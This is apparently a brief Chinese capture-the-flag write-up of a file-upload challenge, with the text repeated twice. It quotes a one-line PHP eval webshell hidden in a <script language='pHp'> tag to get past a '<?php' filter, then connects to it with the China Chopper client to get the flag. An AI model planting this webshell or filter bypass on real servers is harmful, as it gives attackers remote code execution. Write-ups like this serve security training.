打开题目,发现可以上传任意文件
构造一句话木马文件上传
居然上传成功,点开链接
发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容
换一种方式
<script language="pHp">@eval($_POST['sb'])</script>
上传,菜刀无链接
拿到flag
打开题目,发现可以上传任意文件
构造一句话木马文件上传
居然上传成功,点开链接
发现可以查看到代码,<php 应该是被过滤掉了才显示出文本内容
换一种方式
<script language="pHp">@eval($_POST['sb'])</script>
上传,菜刀无链接
拿到flag